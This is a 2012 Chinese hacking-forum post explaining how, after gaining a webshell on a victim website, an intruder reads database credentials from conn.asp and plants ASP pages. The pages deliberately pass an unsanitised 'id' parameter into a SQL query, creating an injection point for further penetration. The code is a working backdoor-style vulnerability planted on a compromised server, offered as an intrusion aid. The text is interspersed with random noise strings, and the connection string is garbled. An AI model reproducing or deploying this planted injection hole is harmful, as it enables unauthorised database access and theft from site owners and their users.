找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2050|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵
$ L- v4 f6 y7 D5 M
8 _& h- b  Q% F: e( _* ~: X# A0 n今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
" z  Y2 X- {( Z% S/ }4 Q& J3 X4 A1 L' x( q
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!$ c8 U* U) J! f- ?; e% u5 T

( Z, X- F! G. K: x% M$ h首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和. H6 Z3 R+ D0 ~6 \7 V4 u
) M3 l+ A0 D/ v3 N- \! s
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
9 J, Q+ y7 N) _9 G/ \. S0 Z3 i- z: m$ r
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
* ]  d2 k/ E* S+ o
8 D- S% }: \* t/ i. i  T8 f程序代码2 l) y6 n) Y5 v8 h& Z+ Y, H6 j& X# a
<!--#include file="xx.asp"-->9 q  e- H/ s- P( d& u5 R0 ^* g
<%
5 I2 j, K- r2 o# U; K! X9 ?7 K& e$ Tset rs=server.createobject("ADODB.recordset")3 v- y( M4 y* i' `# }
id = request("id")
2 b8 G1 x4 J7 z2 W5 F  o+ b0 |strSQL = "select * from admin where id=" & id3 V+ J6 u5 H) ?# H: c( S" z
rs.open strSQL,conn,1,3
0 Q& F& k  w) O) i$ R5 T$ P% Mrs.close
/ K' w1 B' ]$ a" V, p%>
  h4 m: y) U# f. i
- p7 L% v! D: ~& ~+ R9 }& I  \, v把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在7 n5 C( S" N/ G& W0 j0 G

. W) p- f1 K9 M& A; G你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
) _( c' z  Q+ V9 R1 R
# s$ d  `- h5 w7 [& W# n然后就要构造一个连接数据库的文件了,代码如下:
: j  }% r5 U% F2 x/ ?程序代码
# v7 t# F, _) T8 W0 d# k1 G<%        
4 i9 t$ c4 E( J! s( K7 z5 }3 JstrSQLServerName = "000.000.000.000"     '服务器名称或地址
) I4 Q0 N( d" `) t7 |strSQLDBUserName = "sqlname"         '数据库帐号1 s  i6 G8 a( I3 o+ `* j! M3 A  Z
strSQLDBPassword = "sqlpass"         '数据库密码' {# P- Q% W8 Y3 Q
strSQLDBName = "sqldataname"           '数据库名称, R  E9 s" g8 \( |/ A% K
Set conn = Server.CreateObject("ADODB.Connection")
4 Y1 S  t6 A5 n9 istrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"% m3 P' [# k$ y6 s0 s
conn.open strCon
/ u, Z( Y* E" ?%>: W1 |9 j2 z( A" t6 q" H* s

2 j2 S0 i: C% p8 ^0 Y这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,5 c" q, {- W7 p0 `

0 S3 x5 ?  y9 A! e6 @4 n就这样,正常情况下,就OK了,伪造成功……0 H" t0 T% z9 n  d5 x; _
' j- v) ~' e) }8 q+ M9 K1 ?  K
           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表